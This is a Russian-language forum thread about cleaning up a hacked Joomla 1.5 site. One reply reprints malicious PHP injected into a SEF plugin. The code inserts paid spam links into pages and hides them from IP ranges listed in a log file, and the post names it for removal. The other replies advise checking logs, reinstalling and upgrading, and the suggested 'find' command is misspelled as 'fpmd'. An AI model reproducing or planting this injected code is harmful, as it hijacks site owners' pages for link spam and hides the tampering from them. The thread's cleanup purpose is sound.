Взлом сайта на joomle 1,5

Да много куда копать.

Весь движок надо проверять.

Шеллы могут в абсолютно каждом файле и или папке.

Короче, разобрался. Нехорошие граждане решили в мэйнлинке заработать.

1. Идем в plugins/system/sef.php и сносим этот код:

/*<mainlink>*/

$bodyText = JResponse::getBody();

if (preg_match("/((\s+)<link.*)/i", $bodyText, $result)) {

$link = $result[1];

}

$link = preg_replace('/(\s+)/i', '$1<link rel="stylesheet" type="text/css" href="plugins/editors/tinymce/tinymce.css" />', $link, 1);

$bodyText = preg_replace('/((\s+)<link.*)/i', '$1'.$link, $bodyText, 1);

JResponse::setBody($bodyText);

if ($_GET["type"] === "css" && $_GET["v"] === "3.0") {

JResponse::setHeader('Content-Type', "text/css", true);

JResponse::setBody(file_get_contents("plugins/editors/tinymce/tinymce.css"));

}

$dir_path = ( $_SERVER['DOCUMENT_ROOT'] . "/plugins/editors/tinymce/data/");

require_once($dir_path . 'index.php');

$o['USERNAME'] = 'C253E88948E8DD343B5B012DD8980FFD';

$o['charset'] = JFactory::getDocument()->getCharset();

$client_lnk = new MLClient($o);

$bodyText = JResponse::getBody();

$dirPath = realpath("."). "/components/com_content";

if (file_exists($dirPath . "/stat2.log")) {

$ips = file($dirPath . "/stat2.log");

$iplist_cnt = count($ips);

$ip = $_SERVER["REMOTE_ADDR"];

$min = ip2long(long2ip(ip2long($ip) & 0xFFFFFF00));

$max = ip2long(long2ip(ip2long($ip) | 0x000000FF));

for($i = 0; $i < $iplist_cnt; $i++) {

$needle = trim($ips[$i]);

if (($needle >= $min) AND ($needle <= $max)) {

$iKnowYou = true;

break;

}

}

} else {

$iKnowYou = true;

}

$links = $client_lnk->build_links();

if (!$iKnowYou) {

$bodyText = preg_replace("~(.*)(<(\s*?)\/(\s*?)body([^>]*?)>)~s", "$1\r\n<div>" . $links . "</div>$2", $bodyText);

}

JResponse::setBody(preg_replace("~(<(\s*?)body([^>]*?)>)~", "$1\r\n<div class='items-body element'>" . $links . "</div>", $bodyText));

/*</mainlink>*/

2. Идем в plugins\editors\tinymce\data и удаляем index.php .

В папке data удаляем подпапку data со всем содержимым

Все это хорошо, но не дает абсолютно никакой защиты от того, как эти самые товарищи запихнули вам код в указанные файлы, а это значит, что завтра вы снова можете их увидеть.

Смотрите логи откуда и кто влезал чтоб изменить эти файлы.

Как вариант снести движок, установить последнюю версию с официального сайта, не скачивать движок с сайтов, которые предлагают варез, халяву и все платное бесплатно.

1. Если дополнительно не патчили сами движок, то версия 15 имеет по умолчанию как минимум две юязвимости, через которые Вам в любое время зальют новый вредоносный код. Первая это уязвимость в сессиях, вторая в лоадере. Это сам движок, не считая плагинов.

2. Вы уверены, что Вам удалось найти и вычистить все вставки вредоносного кода?

Если должным образом не знаете PHP и не имеете опыта поиска внедрений, то Вам стоит тогда хотя бы найти и просмотреть все файлы, которые недавно модифицировались или изменялись. Если на хостинге доступен доступ по SSH то выполните эти пару команд и проанализируйте результаты:

fpmd . -name "*.php" -mtime -365

fpmd . -name "*.php" -ctime -365

-365 это за последние 365 дней.

А вообще, Вам выше правильно написали, переходите на версию 3,5